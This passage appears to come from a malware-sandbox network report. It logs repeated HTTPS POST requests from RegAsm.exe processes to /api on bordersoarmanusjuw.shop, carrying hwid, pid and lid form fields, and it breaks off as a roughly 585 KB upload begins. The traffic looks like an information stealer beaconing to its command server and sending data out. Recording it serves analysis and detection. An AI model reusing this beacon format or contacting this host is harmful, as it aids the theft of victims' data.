                                                                                                                                            2024-04-21 13:31:24 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:24 UTC5101OUTData Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00
                                                                                                                                            Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                            2024-04-21 13:31:25 UTC820INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:25 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=jjfrtn0j11o36fbucpvd217v2f; expires=Thu, 15-Aug-2024 07:18:04 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y1K5HHQfdnXe1wJiBZ6VkPi%2Fw6cJ%2BRBL5JIU0F0Uiy%2F7BBirm5dPaRPS0mudHQO7gQ2BUk%2BGpLVu3kuBH6QSEJ%2BIQ2RObtrw5uS%2BidnHrlql2xL35UhDmL9tCk7XIkzraK%2FrI3xHFtfrEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbf92938458f-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            17192.168.2.449757172.67.189.664431740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:24 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 7091
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:24 UTC7091OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:25 UTC820INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:25 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=sri8qvr4hkk51l6nv1m0pgckgh; expires=Thu, 15-Aug-2024 07:18:04 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HNkgHSSTS5IUL%2F3%2FCeMFEDmJ5qLCXeqBJw%2B8ckq3NSqMjMgGkKXKv5Gq3Hu4lMRmY9uqj6S3tf15QpV0YFN3wgZXfn8FIjMjpeiEjG%2FHYW00UDKv%2BvXPto4SM5QiOC6ZUI%2BhQyoREv%2BqCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbf97dffb0a0-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            18192.168.2.449758172.67.189.664431740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:25 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1411
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:25 UTC1411OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:26 UTC820INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:26 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=ojak7lidjo1v0127s7396gso4b; expires=Thu, 15-Aug-2024 07:18:04 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dT50sg%2BKQ7K985kNaz5toxjVUF0S6CgqIvQsEdrcOK7jExoCOLMw8aCJmdwAVHyDM1FZvH9rZ%2F5MplmOHuj6ToZkj5DP%2FFfalNg5%2BeHlFh%2BOT8GBDRo19EcxbQ%2F%2B5GAL26A3Oigvo5w5iw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbfd8dbfadc5-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            19192.168.2.449759172.67.189.664435856C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:25 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 7091
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:25 UTC7091OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:26 UTC822INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:26 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=amecd14k0ianp4f50imrf2ojnu; expires=Thu, 15-Aug-2024 07:18:05 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IKwPpVz%2BAsjk9N2ymnBlSk5eXeJi%2BDyPwuznhhvXB6oZb%2BhOnMIJln3zzlG2dbbs3LDRAVRf2hh3R46muEYoe%2BPkcvmqsLTr94FvBsd6oFeYpdK%2Fdl%2BRaeXxlaiTSodt%2B8srXm%2Bq1T9Ezw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbfd8e3c53f8-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            20192.168.2.449760172.67.189.664435900C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:25 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 7091
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:25 UTC7091OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:26 UTC820INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:26 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=lpg1jl8l16co6el6oubr8egr6v; expires=Thu, 15-Aug-2024 07:18:05 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eNP51u63%2Fu80tdHHHHwU3oDwyw%2BQJzNAK6CzG%2F76BOAbS1Jt8nZybYzfRTUdNtYNop3EA0Qgr9JQastyozzGXk4DxxkH%2F3rX82G%2FZKGZoCBFXN7V9I%2Bz0%2FmlBQ4X0L6HgTK3FOM2Pmw03Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbfeefcdad57-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            21192.168.2.449761172.67.189.664435856C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:26 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1411
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:26 UTC1411OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:26 UTC820INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:26 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=99sa8ftogf6k34qacmtjha17bn; expires=Thu, 15-Aug-2024 07:18:05 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=myV1YgETS09pKsS4TggsMj3j0YZj2TbZAUraH4iuMqpZd%2Fymwi2Nm%2FLh6DoQZi%2BoBl5kVxefBX6%2BWBN5CH7aON5g%2FuGUtNXCSrV6EzRufQptRb4tHHYBvPbHW4pNZ4kcCZcw%2Bw1ten%2FZTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc023a007bc3-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            22192.168.2.449762172.67.189.664435900C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:26 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1411
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:26 UTC1411OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:27 UTC814INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:27 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=mrhhcnksvpdlgk1b14td0dtt83; expires=Thu, 15-Aug-2024 07:18:06 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hYt2oEAJmQaZc9cXRtXUdBY0tglAGthgtAX7rpHIcgc%2BAF%2FOGVDkpfs%2BubMv5JvRFxGT159J42T2KntFFVMYG2sm8AR2B%2B2qh4OENkyxYavJqMqroVQYlArBdLAbzxYNa5UEhXAh9uuqtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc03dd30456a-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            23192.168.2.449763172.67.189.664431740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:26 UTC290OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 584825
                                                                                                                                            Host: bordersoarmanusjuw.shop
